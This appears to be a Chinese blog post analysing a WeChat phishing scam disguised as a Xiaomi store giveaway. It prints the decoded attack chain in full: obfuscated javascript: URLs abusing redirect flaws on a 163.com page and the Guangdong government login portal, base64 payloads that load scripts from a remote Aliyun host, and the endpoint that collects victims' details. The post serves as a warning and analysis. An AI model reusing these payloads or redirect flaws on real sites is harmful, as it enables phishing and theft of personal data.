关于朋友圈出现的小米新店广告骗局（非法获取个人消息）木马通过广东政务服务网(tyrz.gd.gov.cn)的url漏洞显示

 

前两天在朋友圈突然看到有发 小米新店开业 送千台扫地机器人的 广告，出于天上不会掉馅饼到我身上的原则 我选择忽略了，但是没多久 看到他又晒了个物流订单，于是还是点开看了一下，发现微信打开的网站还蛮正规的，但是又不是小米的域名，于是我留了个心眼，填了个假地址和电话，然后同样也生成了物流单消息。于是准备来看看到底是真是假。

　　首先朋友圈的广告是这样的

 

 

 

 

 

然后我把图片的二维码发给电脑版微信，电脑版微信扫码后直接 直接打开了腾讯官网，这个时候我就确定看到是那个网站被挂马了，于是就解码了下二维码  发现地址是这样的：

https://shequn.wenwen.163.com/launch.html?url=jav ascr
ipt:a=\u0061\u0074\u006f\u0062`aW1wb3J0KCcvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvMTYzX3JrJyk=`;\u0065\u0076\u0061\u006c(a)

分析了一下 居然是一个 base64的js脚本，像是通过个人的163博客做为基本跳转的  脚本也很简单

 

 

 

(function(url) {
				if (url) {
					location.href = url
				}
			})(getQuery('url'))

			function getQuery(name) {
				var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
				var r = window.location.search.substr(1).match(reg);
				if (r != null) return unescape(r[2]);
				return null;
			}

　　

通过base64 解码 js 代码 是 ：import('//ucbt.oss-accelerate.aliyuncs.com/x/163_rk')

才发现他居然是通过阿里云的oss 做具体脚本跳转的

 下载代码后 发现还有几层跳转

 

 

最后跳到了 广东政务服务网 广东省统一身份认证平台  https://tyrz.gd.gov.cn，

最后的跳转地址是：https://tyrz.gd.gov.cn/pscp/sso/static/countrytransfer?src=javas%09cript%3Aa%3D%5Cu0061%5Cu0074%5Cu006f%5Cu0062%60ZG9jdW1lbnQuYm9keS5oaWRkZW49dHJ1ZTtkb2N1bWVudC50aXRsZT0nJzt2PWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Yuc3JjPSIvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvZ2Rndl9sZCI7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60%3B%5Cu0065%5Cu0076%5Cu0061%5Cu006c%28a%29%2F%2F&xkey=52&bhufjr

解析这段js 的内容是

document.body.hidden=true;document.title='';v=document.createElement('script');v.src="//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld";document.head.appendChild(v);

　　跳转到了真正界面 

//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld

 

 然后他通过 让你填写手机号 地址等信息  进行个人信息收集，最后提交到了一个网站：https://dxjyxq.com/admin/token/saveAddress_2/?name=1111&tel=15388880000&region=%E7%A6%8F%E5%BB%BA+%2F+%E5%AE%81%E5%BE%B7+%2F+%E9%9C%9E%E6%B5%A6%E5%8E%BF&address=111

我开始以为这个网站是没备案的，一查才发现居然是备案的域名

 

 

 

 

 还有他建立了一个qq群，目前qq群人数还在持续增加，目前不太明确具体他收集这些信息是干什么用的 ，但是总的还是那句话 天上不会掉馅饼啊，

整理了一下思路，感觉作者还是很有才华的

首先通过 url 注入的第一段代码来看 他利用加空格、换行符等特殊文本来绕过 注入检测

第二个是 利用 知名网站的 微信js 认证脚本 确保 你在微信里面访问（不仅仅是判断浏览器，而是判断微信js 是否可以出售成功，然后隐藏了分享等按钮）